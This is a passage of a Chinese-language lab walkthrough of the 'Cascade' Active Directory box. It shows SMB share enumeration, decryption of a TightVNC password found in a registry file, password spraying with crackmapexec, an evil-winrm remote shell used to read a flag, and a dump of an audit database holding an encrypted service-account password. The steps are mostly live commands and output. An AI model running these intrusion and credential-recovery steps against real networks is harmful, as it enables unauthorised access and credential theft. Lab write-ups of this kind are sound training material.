  hpd2600t.dll.mui                    A    47616  Tue Jul 14 10:27:56 2009
  hpD5400t.dll.mui                    A    49152  Tue Jul 14 10:27:28 2009
  hpd7500t.dll.mui                    A    49152  Tue Jul 14 10:27:04 2009
  hpf4400t.dll.mui                    A    47616  Tue Jul 14 10:24:56 2009
  hpfevw73.dll.mui                    A     5120  Tue Jul 14 10:28:30 2009
  hpfiew71.dll.mui                    A     2048  Tue Jul 14 10:30:16 2009
  hpfiew73.dll.mui                    A     2048  Tue Jul 14 10:30:02 2009
  HPFIME50.DLL.mui                    A     2048  Tue Jul 14 10:29:42 2009
  hpfprw73.dll.mui                    A     3584  Tue Jul 14 10:30:04 2009
  HPZ3Awn7.DLL.mui                    A    21504  Tue Jul 14 10:25:12 2009
  HPZEVW71.DLL.mui                    A     6144  Tue Jul 14 10:27:10 2009
  hpzevw72.dll.mui                    A     5120  Tue Jul 14 10:26:18 2009
  HPZEVWN7.DLL.mui                    A     5120  Tue Jul 14 10:24:36 2009
  hpzlaw71.dll.mui                    A    20992  Tue Jul 14 10:26:52 2009
  HPZLAwn7.DLL.mui                    A    14336  Tue Jul 14 10:27:38 2009
  HPZLSWN7.DLL.mui                    A    18944  Tue Jul 14 10:28:30 2009
  hpzprw71.dll.mui                    A     3584  Tue Jul 14 10:26:42 2009
  hpzprw72.dll.mui                    A     3584  Tue Jul 14 10:25:22 2009
  HPZPRwn7.DLL.mui                    A     3584  Tue Jul 14 10:26:08 2009
  HPZUIW71.DLL.mui                    A    67584  Tue Jul 14 10:25:24 2009
  HPZUIWN7.DLL.mui                    A    47616  Tue Jul 14 10:24:52 2009
  KO0C0001.DLL.mui                    A    15360  Tue Jul 14 10:26:04 2009
  KYW7FR02.DLL.mui                    A     2048  Tue Jul 14 10:25:50 2009
  kyw7fr03.dll.mui                    A     2048  Tue Jul 14 10:27:10 2009
  kyw7fr04.dll.mui                    A     2048  Tue Jul 14 10:26:52 2009
  KYW7FRES.DLL.mui                    A     2048  Tue Jul 14 10:24:12 2009
  lxkpclrs.dll.mui                    A     7168  Tue Jul 14 10:28:16 2009
  lxkpclui.dll.mui                    A    27648  Tue Jul 14 10:25:08 2009
  lxkpsui.dll.mui                     A    30208  Tue Jul 14 10:27:36 2009
  LXKXLRES.DLL.mui                    A     8192  Tue Jul 14 10:27:10 2009
  LXKXLUI.DLL.mui                     A    27648  Tue Jul 14 10:27:28 2009
  OK9IBRES.DLL.mui                    A     3072  Tue Jul 14 10:29:08 2009
  OKDTERES.DLL.mui                    A     9216  Tue Jul 14 10:30:02 2009
  OKDTURES.DLL.mui                    A     6656  Tue Jul 14 10:28:12 2009
  PCL4RES.DLL.mui                     A     7168  Tue Jul 14 10:24:08 2009
  PCL5ERES.DLL.mui                    A    18944  Tue Jul 14 10:29:32 2009
  PCL5URES.DLL.mui                    A    18944  Tue Jul 14 10:28:40 2009
  PCLXL.DLL.mui                       A     2560  Tue Jul 14 10:23:42 2009
  PS5UI.DLL.mui                       A    14336  Tue Jul 14 10:29:50 2009
  PSCRIPT5.DLL.mui                    A     4096  Tue Jul 14 10:25:02 2009
  RIARES7.DLL.mui                     A    10752  Tue Jul 14 10:29:58 2009
  RIAUI17.DLL.mui                     A    29696  Tue Jul 14 10:26:28 2009
  RIAUI27.DLL.mui                     A    29696  Tue Jul 14 10:24:38 2009
  RIPSUI7.DLL.mui                     A    29696  Tue Jul 14 10:27:26 2009
  SH_1_RES.DLL.mui                    A    17408  Tue Jul 14 10:24:42 2009
  SODPPUI2.DLL.mui                    A     4096  Tue Jul 14 10:27:50 2009
  tsmxuui3.dll.mui                    A     6144  Tue Jul 14 10:29:24 2009
  tsprint.dll.mui                     A     4096  Tue Jul 14 10:24:24 2009
  TTYRES.DLL.mui                      A     2560  Tue Jul 14 10:30:28 2009
  TTYUI.DLL.mui                       A     5120  Tue Jul 14 10:29:30 2009
  UNIDRVUI.DLL.mui                    A    11264  Tue Jul 14 10:27:10 2009
  UNIRES.DLL.mui                      A     8704  Tue Jul 14 10:28:18 2009

\x64\3\mui
  .                                   D        0  Tue Jul 14 13:41:16 2009
  ..                                  D        0  Tue Jul 14 13:41:16 2009
  0409                                D        0  Tue Jul 14 13:41:16 2009

\x64\3\mui\0409
  .                                   D        0  Tue Jul 14 13:41:16 2009
  ..                                  D        0  Tue Jul 14 13:41:16 2009
  PSCRIPT.HLP                         A    26038  Thu Jun 11 05:41:00 2009
  TTYUI.HLP                           A    14387  Thu Jun 11 05:41:00 2009
  UNIDRV.HLP                          A    21225  Thu Jun 11 05:41:00 2009

                6553343 blocks of size 4096. 1613811 blocks available
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\SYSVOL -U r.thompson%rY4n5eva -c "recurse; ls" 
  .                                   D        0  Thu Jan  9 23:31:27 2020
  ..                                  D        0  Thu Jan  9 23:31:27 2020
  cascade.local                      Dr        0  Thu Jan  9 23:31:27 2020

\cascade.local
  .                                   D        0  Thu Jan  9 23:33:07 2020
  ..                                  D        0  Thu Jan  9 23:33:07 2020
  DfsrPrivate                      DHSr        0  Thu Jan  9 23:33:07 2020
  Policies                            D        0  Fri Jan 10 03:42:40 2020
  scripts                             D        0  Thu Jan 16 05:50:33 2020

\cascade.local\DfsrPrivate
NT_STATUS_ACCESS_DENIED listing \cascade.local\DfsrPrivate\*

\cascade.local\Policies
  .                                   D        0  Fri Jan 10 03:42:40 2020
  ..                                  D        0  Fri Jan 10 03:42:40 2020
  {2906D621-7B58-40F1-AA47-4ED2AEF29484}      D        0  Fri Jan 10 02:13:00 2020
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Thu Jan  9 23:31:40 2020
  {322FEA29-156D-4476-8A06-1935A3525C1C}      D        0  Fri Jan 10 02:29:34 2020
  {4026EDF8-DBDA-4AED-8266-5A04B80D9327}      D        0  Fri Jan 10 03:42:31 2020
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Thu Jan  9 23:31:40 2020
  {820E48A7-D083-4C2D-B5F8-B24462924714}      D        0  Fri Jan 10 02:33:51 2020
  {D67C2AD5-44C7-4468-BA4C-199E75B2F295}      D        0  Fri Jan 10 03:42:40 2020

\cascade.local\scripts
  .                                   D        0  Thu Jan 16 05:50:33 2020
  ..                                  D        0  Thu Jan 16 05:50:33 2020
  MapAuditDrive.vbs                   A      258  Thu Jan 16 05:50:15 2020
  MapDataDrive.vbs                    A      255  Thu Jan 16 05:51:03 2020

\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484}
  .                                   D        0  Fri Jan 10 02:13:00 2020
  ..                                  D        0  Fri Jan 10 02:13:00 2020
  GPT.INI                             A       59  Fri Jan 10 02:13:00 2020
  Machine                             D        0  Fri Jan 10 02:13:00 2020
  User                                D        0  Fri Jan 10 02:13:00 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020
  GPT.INI                             A       23  Mon Mar 23 16:33:59 2020
  MACHINE                             D        0  Thu Jan  9 23:31:40 2020
  USER                                D        0  Thu Jan  9 23:31:40 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}
  .                                   D        0  Fri Jan 10 02:29:34 2020
  ..                                  D        0  Fri Jan 10 02:29:34 2020
  GPO.cmt                             A       24  Fri Jan 10 02:29:34 2020
  GPT.INI                             A       64  Wed Jan 29 06:07:51 2020
  Machine                             D        0  Fri Jan 10 03:45:58 2020
  User                                D        0  Fri Jan 10 03:46:06 2020

\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327}
  .                                   D        0  Fri Jan 10 03:42:31 2020
  ..                                  D        0  Fri Jan 10 03:42:31 2020
  GPT.INI                             A       59  Fri Jan 10 03:42:31 2020
  Machine                             D        0  Fri Jan 10 03:42:31 2020
  User                                D        0  Fri Jan 10 03:42:31 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020
  GPT.INI                             A       23  Mon Jan 27 01:12:15 2020
  MACHINE                             D        0  Thu Jan  9 23:31:40 2020
  USER                                D        0  Thu Jan  9 23:31:40 2020

\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714}
  .                                   D        0  Fri Jan 10 02:33:51 2020
  ..                                  D        0  Fri Jan 10 02:33:51 2020
  GPT.INI                             A       59  Fri Jan 10 02:33:51 2020
  Machine                             D        0  Fri Jan 10 02:33:51 2020
  User                                D        0  Fri Jan 10 02:33:51 2020

\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295}
  .                                   D        0  Fri Jan 10 03:42:40 2020
  ..                                  D        0  Fri Jan 10 03:42:40 2020
  GPT.INI                             A       59  Fri Jan 10 03:42:40 2020
  Machine                             D        0  Fri Jan 10 03:42:40 2020
  User                                D        0  Fri Jan 10 03:42:40 2020

\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484}\Machine
  .                                   D        0  Fri Jan 10 02:13:00 2020
  ..                                  D        0  Fri Jan 10 02:13:00 2020

\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484}\User
  .                                   D        0  Fri Jan 10 02:13:00 2020
  ..                                  D        0  Fri Jan 10 02:13:00 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020
  Microsoft                           D        0  Thu Jan  9 23:31:40 2020
  Registry.pol                        A     2790  Thu Jan  9 23:48:03 2020
  Scripts                             D        0  Thu Jan  9 23:50:50 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine
  .                                   D        0  Fri Jan 10 03:45:58 2020
  ..                                  D        0  Fri Jan 10 03:45:58 2020
  Scripts                             D        0  Fri Jan 10 03:45:58 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User
  .                                   D        0  Fri Jan 10 03:46:06 2020
  ..                                  D        0  Fri Jan 10 03:46:06 2020
  Documents & Settings                D        0  Fri Jan 10 03:46:06 2020
  Scripts                             D        0  Fri Jan 10 03:46:06 2020

\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327}\Machine
  .                                   D        0  Fri Jan 10 03:42:31 2020
  ..                                  D        0  Fri Jan 10 03:42:31 2020

\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327}\User
  .                                   D        0  Fri Jan 10 03:42:31 2020
  ..                                  D        0  Fri Jan 10 03:42:31 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020
  Applications                        D        0  Fri Jan 10 05:56:53 2020
  Microsoft                           D        0  Thu Jan  9 23:31:40 2020
  Scripts                             D        0  Fri Jan 10 02:44:58 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020

\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714}\Machine
  .                                   D        0  Fri Jan 10 02:33:51 2020
  ..                                  D        0  Fri Jan 10 02:33:51 2020

\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714}\User
  .                                   D        0  Fri Jan 10 02:33:51 2020
  ..                                  D        0  Fri Jan 10 02:33:51 2020

\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295}\Machine
  .                                   D        0  Fri Jan 10 03:42:40 2020
  ..                                  D        0  Fri Jan 10 03:42:40 2020

\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295}\User
  .                                   D        0  Fri Jan 10 03:42:40 2020
  ..                                  D        0  Fri Jan 10 03:42:40 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020
  Windows NT                          D        0  Thu Jan  9 23:31:40 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts
  .                                   D        0  Thu Jan  9 23:50:50 2020
  ..                                  D        0  Thu Jan  9 23:50:50 2020
  Shutdown                            D        0  Thu Jan  9 23:50:50 2020
  Startup                             D        0  Thu Jan  9 23:50:50 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts
  .                                   D        0  Fri Jan 10 03:45:58 2020
  ..                                  D        0  Fri Jan 10 03:45:58 2020
  Shutdown                            D        0  Fri Jan 10 03:45:58 2020
  Startup                             D        0  Fri Jan 10 03:45:58 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Documents & Settings
  .                                   D        0  Fri Jan 10 03:46:06 2020
  ..                                  D        0  Fri Jan 10 03:46:06 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts
  .                                   D        0  Fri Jan 10 03:46:06 2020
  ..                                  D        0  Fri Jan 10 03:46:06 2020
  Logoff                              D        0  Fri Jan 10 03:46:06 2020
  Logon                               D        0  Wed Jan 29 06:07:49 2020
  scripts.ini                         H        6  Wed Jan 29 06:07:51 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Applications
  .                                   D        0  Fri Jan 10 05:56:53 2020
  ..                                  D        0  Fri Jan 10 05:56:53 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020
  Windows NT                          D        0  Thu Jan  9 23:31:40 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts
  .                                   D        0  Fri Jan 10 02:44:58 2020
  ..                                  D        0  Fri Jan 10 02:44:58 2020
  Shutdown                            D        0  Fri Jan 10 02:44:58 2020
  Startup                             D        0  Fri Jan 10 02:44:58 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020
  SecEdit                             D        0  Thu Jan  9 23:51:09 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\Shutdown
  .                                   D        0  Thu Jan  9 23:50:50 2020
  ..                                  D        0  Thu Jan  9 23:50:50 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\Startup
  .                                   D        0  Thu Jan  9 23:50:50 2020
  ..                                  D        0  Thu Jan  9 23:50:50 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts\Shutdown
  .                                   D        0  Fri Jan 10 03:45:58 2020
  ..                                  D        0  Fri Jan 10 03:45:58 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts\Startup
  .                                   D        0  Fri Jan 10 03:45:58 2020
  ..                                  D        0  Fri Jan 10 03:45:58 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts\Logoff
  .                                   D        0  Fri Jan 10 03:46:06 2020
  ..                                  D        0  Fri Jan 10 03:46:06 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts\Logon
  .                                   D        0  Wed Jan 29 06:07:49 2020
  ..                                  D        0  Wed Jan 29 06:07:49 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
  .                                   D        0  Thu Jan  9 23:31:40 2020
  ..                                  D        0  Thu Jan  9 23:31:40 2020
  SecEdit                             D        0  Mon Jan 27 01:12:15 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts\Shutdown
  .                                   D        0  Fri Jan 10 02:44:58 2020
  ..                                  D        0  Fri Jan 10 02:44:58 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts\Startup
  .                                   D        0  Fri Jan 10 02:44:58 2020
  ..                                  D        0  Fri Jan 10 02:44:58 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
  .                                   D        0  Thu Jan  9 23:51:09 2020
  ..                                  D        0  Thu Jan  9 23:51:09 2020
  GptTmpl.inf                         A     1248  Mon Mar 23 16:33:59 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
  .                                   D        0  Mon Jan 27 01:12:15 2020
  ..                                  D        0  Mon Jan 27 01:12:15 2020
  GptTmpl.inf                         A     4086  Mon Jan 27 01:12:15 2020




根据SMB共享的文件情况，开始枚举看看有啥好东西


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Data -U r.thompson%rY4n5eva                  
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 27 11:27:34 2020
  ..                                  D        0  Mon Jan 27 11:27:34 2020
  Contractors                         D        0  Mon Jan 13 09:45:11 2020
  Finance                             D        0  Mon Jan 13 09:45:06 2020
  IT                                  D        0  Wed Jan 29 02:04:51 2020
  Production                          D        0  Mon Jan 13 09:45:18 2020
  Temps                               D        0  Mon Jan 13 09:45:15 2020

                6553343 blocks of size 4096. 1613814 blocks available
smb: \> get \IT\"Email Archives"\Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as \IT\Email Archives\Meeting_Notes_June_2018.html (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \> get \IT\Logs\"Ark AD Recycle Bin"\ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log (2.6 KiloBytes/sec) (average 4.1 KiloBytes/sec)
smb: \> get \IT\Logs\DCs\dcdiag.log
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as \IT\Logs\DCs\dcdiag.log (11.6 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \> get \IT\Temp\s.smith\"VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as \IT\Temp\s.smith\VNC Install.reg (5.9 KiloBytes/sec) (average 6.6 KiloBytes/sec)
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\NETLOGON -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> get MapAuditDrive.vbs
getting file \MapAuditDrive.vbs of size 258 as MapAuditDrive.vbs (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> get MapDataDrive.vbs
getting file \MapDataDrive.vbs of size 255 as MapDataDrive.vbs (0.5 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> exit

9、然后我根据我比较感兴趣的文件，进行了下载

file:///home/kali/Desktop/%5CIT%5CEmail%20Archives%5CMeeting_Notes_June_2018.html

我们将使用临时帐户执行与网络迁移相关的所有任务，一旦迁移完成，此帐户将在2018年底删除。这将使我们能够在安全日志等中识别与迁移相关的操作。这是TempAdmin（密码与正常管理员帐户密码相同）。

1
2
3

\IT\Temp\s.smith\VNC Install.reg

"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

10、这里发现了VNC的密码，这里需要破解

破解 VNC 密码，一些有关 TightVNC 的阅读表明它将密码存储在使用静态密钥加密的寄存器中。有很多工具可以做到这一点。我用过这个。它需要一个带有密文的文件，我用以下命令创建了该文件echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass：

root@kali# /opt/vncpwd/vncpwd vnc_enc_pass
Password: sT333ve2

该命令使用-r -p中的选项xxd将十六进制字符串转换为运行的二进制文件。

我还可以使用 Bash 技巧将命令输出视为文件的内容<( )：

root@kali# /opt/vncpwd/vncpwd <(echo '6bcf2a4b6e5aca0f' | xxd -r -p)
Password: sT333ve2 此链接显示了如何在 Metaspoit 中执行此操作，并且它也有效：

11、我根据上面的演练报告进行操作

┌──(kali㉿offsec)-[~/Desktop/vncpwd]
└─$ gcc -o vncpwd vncpwd.c d3des.c 

┌──(kali㉿offsec)-[~/Desktop/vncpwd]
└─$ ./vncpwd    
Usage: vncpwd <password file>

┌──(kali㉿offsec)-[~/Desktop/vncpwd]
└─$ ./vncpwd ../vnc_enc_pass 
Password: sT333ve2

12、成功获取到了密码，下面使用该密码进行账号枚举

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.182 -u users -p 'sT333ve2' --continue-on-success
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\CascGuest:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\arksvc:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\r.thompson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\util:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.wakefield:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\s.hickson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.goodhand:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\a.turnbull:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\e.crowe:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\b.hanson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\d.burman:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\BackupSvc:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.allen:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\i.croft:sT333ve2 STATUS_LOGON_FAILURE

13、到这里，其实我nmap扫描端口，还是漏扫了，这里5985端口是开放的

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p5985 10.10.10.182                                                               
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-14 04:15 CST
Nmap scan report for cascade.local (10.10.10.182)
Host is up (0.11s latency).

PORT     STATE SERVICE
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

14、使用该账号登录，并获取flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p 'sT333ve2'        
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> type ../Desktop/user.txt
ec388584ac52ba6f22693789b0f923eb
*Evil-WinRM* PS C:\Users\s.smith\Documents>

0x02 系统权限获取

15、先进行简单的信息枚举

*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 8:58:05 PM
Password expires             Never
Password changeable          1/28/2020 8:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 MapAuditDrive.vbs
User profile
Home directory
Last logon                   1/29/2020 12:26:39 AM

Logon hours allowed          All

Local Group Memberships      *Audit Share          *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents>


*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Audit Share"
Alias name     Audit Share
Comment        \\Casc-DC1\Audit$

Members

-------------------------------------------------------------------------------
s.smith
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents>


*Evil-WinRM* PS C:\Users\s.smith\Documents> cd C:\shares\audit
*Evil-WinRM* PS C:\shares\audit> ls


    Directory: C:\shares\audit


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/28/2020   9:40 PM                DB
d-----        1/26/2020  10:25 PM                x64
d-----        1/26/2020  10:25 PM                x86
-a----        1/28/2020   9:46 PM          13312 CascAudit.exe
-a----        1/29/2020   6:00 PM          12288 CascCrypto.dll
-a----        1/28/2020  11:29 PM             45 RunAudit.bat
-a----       10/27/2019   6:38 AM         363520 System.Data.SQLite.dll
-a----       10/27/2019   6:38 AM         186880 System.Data.SQLite.EF6.dll


*Evil-WinRM* PS C:\shares\audit>

16、这里我枚举时发现上述文件的数据库和Exe文件，我使用SMB进行下载查看

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2 -c "recurse; ls"
  .                                   D        0  Thu Jan 30 02:01:26 2020
  ..                                  D        0  Thu Jan 30 02:01:26 2020
  CascAudit.exe                      An    13312  Wed Jan 29 05:46:51 2020
  CascCrypto.dll                     An    12288  Thu Jan 30 02:00:20 2020
  DB                                  D        0  Wed Jan 29 05:40:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 07:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 14:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 14:38:38 2019
  x64                                 D        0  Mon Jan 27 06:25:27 2020
  x86                                 D        0  Mon Jan 27 06:25:27 2020

\DB
  .                                   D        0  Wed Jan 29 05:40:59 2020
  ..                                  D        0  Wed Jan 29 05:40:59 2020
  Audit.db                           An    24576  Wed Jan 29 05:39:24 2020

\x64
  .                                   D        0  Mon Jan 27 06:25:27 2020
  ..                                  D        0  Mon Jan 27 06:25:27 2020
  SQLite.Interop.dll                  A  1639936  Sun Oct 27 14:39:20 2019

\x86
  .                                   D        0  Mon Jan 27 06:25:27 2020
  ..                                  D        0  Mon Jan 27 06:25:27 2020
  SQLite.Interop.dll                  A  1246720  Sun Oct 27 14:34:20 2019

                6553343 blocks of size 4096. 1613017 blocks available

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2                 
Try "help" to get a list of possible commands.
smb: \> cd DB
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (35.2 KiloBytes/sec) (average 35.2 KiloBytes/sec)
smb: \DB\> exit
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ file Audit.db                                                                                                                                               
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60

┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlite3 Audit.db 
SQLite version 3.44.2 2023-11-24 11:41:44
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit  Ldap              Misc            
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc;
sqlite>

17、没有什么特别有趣的事情。我认为该Ldap表中可能有密码，但 Base64 编码的数据无法解码为 ASCII。也许它以某种方式加密了。

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (20.9 KiloBytes/sec) (average 20.9 KiloBytes/sec)
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ file CascAudit.exe 
